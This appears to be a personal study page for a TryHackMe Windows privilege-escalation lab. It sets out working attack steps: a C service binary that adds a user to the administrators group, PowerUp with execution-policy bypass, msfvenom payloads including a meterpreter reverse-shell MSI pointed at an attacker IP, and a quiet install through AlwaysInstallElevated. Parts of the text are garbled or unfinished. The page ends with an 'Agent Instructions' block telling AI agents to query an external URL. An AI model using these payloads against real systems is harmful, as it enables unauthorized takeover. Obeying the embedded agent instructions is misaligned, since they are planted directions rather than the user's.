# THM - Windows PrivEsc Arena
Students will learn how to escalate privileges using a very vulnerable Windows 7 VM. RDP is open. Your credentials are user:password321
connect rdp
```bash
rdesktop 10.10.50.130 -g 95%
```
PowerUp
```powershell
powershell.exe -ep bypass
import-module powerup.p1
invoke-AllChecks
```
```
lcacls.exe
```
Code C to make privesc in win7
### Service Escalation - Registry
#### Detection
```powershell
Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
```
{% hint style="danger" %}
Notice that the output suggests that user belong to “**NT** **AUTHORITY**\\**INTERACTIVE**” has “**FullContol**” permission over the registry key.
{% endhint %}
#### Exploitation
```c
#include
#include
#define SLEEP_TIME 5000
SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE hStatus;
void ServiceMain(int argc, char** argv);
void ControlHandler(DWORD request);
//add the payload here
int Run()
{
system("cmd.exe /k net localgroup administrators user /add");
return 0;
}
int main()
{
SERVICE_TABLE_ENTRY ServiceTable[2];
ServiceTable[0].lpServiceName = "MyService";
ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;
ServiceTable[1].lpServiceName = NULL;
ServiceTable[1].lpServiceProc = NULL;
StartServiceCtrlDispatcher(ServiceTable);
return 0;
}
void ServiceMain(int argc, char** argv)
{
ServiceStatus.dwServiceType = SERVICE_WIN32;
ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwServiceSpecificExitCode = 0;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
hStatus = RegisterServiceCtrlHandler("MyService", (LPHANDLER_FUNCTION)ControlHandler);
Run();
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
SetServiceStatus (hStatus, &ServiceStatus);
while (ServiceStatus.dwCurrentState == SERVICE_RUNNING)
{
Sleep(SLEEP_TIME);
}
return;
}
void ControlHandler(DWORD request)
{
switch(request)
{
case SERVICE_CONTROL_STOP:
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
SetServiceStatus (hStatus, &ServiceStatus);
return;
case SERVICE_CONTROL_SHUTDOWN:
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
SetServiceStatus (hStatus, &ServiceStatus);
return;
default:
break;
}
SetServiceStatus (hStatus, &ServiceStatus);
return;
}
```
```powershell
sc start filepermsvc
```
To Delete user from group
```powershell
net localgroup Administrators user /DELETE�
```
Escalation va Unquoted Path
```bash
msfvenom -p windows/exec CMD='net localgroup Administrators user /add ' -f exe -o /home/h3ckt0r/tool/privesc/common.exe
updog -p 8080
```
nqoted path
### Registry Escalation - AlwaysInstallElevated
> 1.Open command prompt and type: **reg query**\
> **HKLM\Software\Policies\Microsoft\Windows\Installer** \
> 2.From the output, notice that “**AlwaysInstallElevated**” value is **1**
>
>
{% code overflow="wrap" %}
```
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.9.0.213 -f msi -o setup.msi
```
{% endcode %}
1.Place ‘setup.msi’ in ‘C:\\**Temp**’.\
2.Open command prompt and type: **msiexec /quiet /qn /i C:\Temp\setup.msi**
### Service Escalation - Executable Files
Service Escalation - DLL Hijacking
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://h3ckt0r.gitbook.io/0xsec/offensive-security/oscp/module-18-privllege-escalation/windows/thm-windows-privesc-arena.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.